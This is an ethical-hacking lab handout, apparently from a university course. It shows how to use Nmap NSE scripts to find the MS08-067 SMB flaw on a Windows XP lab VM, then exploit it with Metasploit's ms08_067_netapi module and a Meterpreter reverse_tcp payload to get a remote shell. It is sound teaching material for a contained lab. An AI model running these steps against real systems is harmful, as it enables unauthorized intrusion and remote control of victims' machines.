Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

Lab 5 - Using The Nmap Scripting Engine (NSE) and Metasploit To Exploit Windows XP

Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1of 9

Lab - Nmap Scripting Engine (NSE)

Warning! Warning! Warning!


Any IP address information shown in this lab does not pertain to you. Your results will differ.
The images are just guides to help ensure that the student sees the right screen. Obtaining any
results other than an epic failure is confirmation the lab completed successfully.
This lab requires the creation of a second virtual machine for Windows XP SP2. This is the
victim machine used as a target for the remaining labs.

Hardware requirements for these labs:

1. One VM of Kali
2. One VM of Windows XP SP2 (Lab 2a)

Nmap is one of the few tools that every hacker should be conversant in. Although it is not
perfect, it is excellent for active reconnaissance. Although I discourage the use of Windows for
hacking, Nmap does have a version for Windows with a nice GUI called Zenmap.

Nmap Scripting Engine (NSE)

The Nmap scripting engine is one of Nmap's most powerful and, at the same time, most flexible
features. It allows users to write their own scripts and share these scripts with other users for the
purposes of networking, reconnaissance, etc. These scripts can be used for:

 Network discovery
 More sophisticated and accurate OS version detection
 Vulnerability detection
 Backdoor detection
 Vulnerability exploitation

In this Lab, we will look at the scripts that have been shared and are built into Kali and how to
use them to do thorough recon on our target to increase the probability of success.

Begin the lab

 Start Kali & Open a Terminal.


 Open your Windows XP VM.

Find the Nmap Scripts

Ethical Hacking – KL University NSF


From the terminal, look for the Nmap scripts. All of the scripts should end in .nse (nmap
scripting engine), so we can find the scripts by using the Linux locate command with the
wildcard *.nse. That should find all files ending in .nse.

kali > locate *.nse

As you can see in the screenshot above, our terminal displays hundreds of Nmap scripts.

Finding Vulnerability Scanning Scripts

Among the most useful to us are the vulnerability scanning scripts. These scripts are usually
designed to find a specific vulnerability or type of vulnerability that we can then come back later
and exploit. To locate those scripts that we can use for vulnerability scanning, we can type:

kali> locate *vuln*.nse

Ethical Hacking – KL University NSF


As you can see, it returned a few vulnerability scanning scripts. I have circled the one we will
use for the remainder of the lab, smb-check-vulns-ms08-067.nse. This script checks the victim to
see whether it has any of the well-known SMB vulnerabilities such as MS08-067.

Running the Script

1. Ensure the Windows XP Virtual Machine is up and running. You will need the IP address of
your victim to run this script. Think back to Lab 3, what Nmap commands could you use to foot
print and discover the IP of your Windows XP victim? You can also get the IP by logging on to
the victim and running IPCONFIG from a command prompt.

The basic syntax for running these scripts is this:


3

Ethical Hacking – KL University NSF


 nmap --script <scriptname> <host ip>

Try running the SMB vulnerability checking script against your Windows XP victim.

nmap --script smb-vuln-ms08-067.nse -p445 <insert host IP address>

Now, when I run the command, I get much more useful results.

As you can see, it tells me that MS08-067 is vulnerable, so now I know I can use that module in
Metasploit to exploit that system!

1. From your Terminal, type exit.


2. Type clear.
4

Ethical Hacking – KL University NSF


3. To launch Metasploit, type msfconsole at the kali prompt.

We need to know the difference between an exploit and a payload. The exploit is the flaw in the
system that you are going to take advantage of. In the case of MS08-067, it is a problem is the
SMB service. When we search for modules within Metasploit, we are simply looking for
exploits. From the Metasploit command line, we can find a specific exploit by using the search
command “search ms08″ or whatever exploit you want.

A payload is what we send to the victim once we execute the exploit. Different payloads for
different exploits.

To choose our exploit, type “use exploit/windows/smb/ms08_067_netapi”

To see what options need to inputted, type show options

Ethical Hacking – KL University NSF


RHOST is the victim or the remote machine. We need to know the IP address of the target
machine. In the previous lab, we looked at how we find a specific target. Your Windows XP VM
should be up and running. Log in to your Windows XP victim, open a command prompt and find
the IP address by typing IPCONFIG.

Stop! This is my IP address, not yours! Your Windows XP IP address will differ.

Again, the RHOST is the remote machine or the machine we are attacking. To set this, I’ll enter
“set RHOST 192.168.225.134″ at the exploit prompt.

You also need to set the LHOST or the Local Host IP address. If you don’t know what the IP
address is of your Kali machine, type ifconfig at the exploit prompt.

Ethical Hacking – KL University NSF


Now we set the payload. Each exploit will come with a number of payloads, but there are certain
payloads that every pentester/hacker relies on. We can look through the payloads by using the
show payloads command.

We want to take over the machine and have our way with it, and nothing says hackfest like a
remote shell connection with a victim. To get this remote shell, we will use one the most popular
payloads found in Metasploit called Meterpreter.

Meterpreter is a very powerful payload with plenty of options, but the most popular is the ability
to establish a remote shell with the victim.

We prefer the remote shell because it gives a complete run of the remote machine as if we were
physically sitting at the keyboard.

The payload we want is windows/meterpreter/reverse_tcp

Ethical Hacking – KL University NSF


To use the payload, we use the set payload command.

All that is left to do is launch the payload in the direction of the victim. To do this, we use the
exploit command.

Success! We now have a remote shell running on our victim. Earlier in the lab, we ran the
IPCONFIG command on our windows XP victim. To do so we had to get access to the machine
physically. We can now bring up a command prompt and run the IPCONFIG command using the
remote shell.

At the meterpreter prompt, type shell. The prompt changes to the command prompt on our
victim machine. Type IPCONFIG.

Ethical Hacking – KL University NSF


Meterpreter comes with a large number of commands that can be run against the victim. Type
exit to come back to the Meterpreter prompt.

For a complete listing of Meterpreter commands, type help.

Summary

This lab picked up where the previous Nmap lab left off. Once we identified the victim and we
identified the victim as being Windows XP, we check the victim for the MS08-067vulnerability.

Once we confirmed the vulnerability did exist, we searched for an exploit for MS08-067 inside
of Metasploit. We then launched the Meterpreter payload and established a remote shell to the
victim.

Having a firewall enabled, patching windows XP and ensuring our virus scanner is up to date
would have prevented this exploit from running.

End of Lab!

Ethical Hacking – KL University NSF

You might also like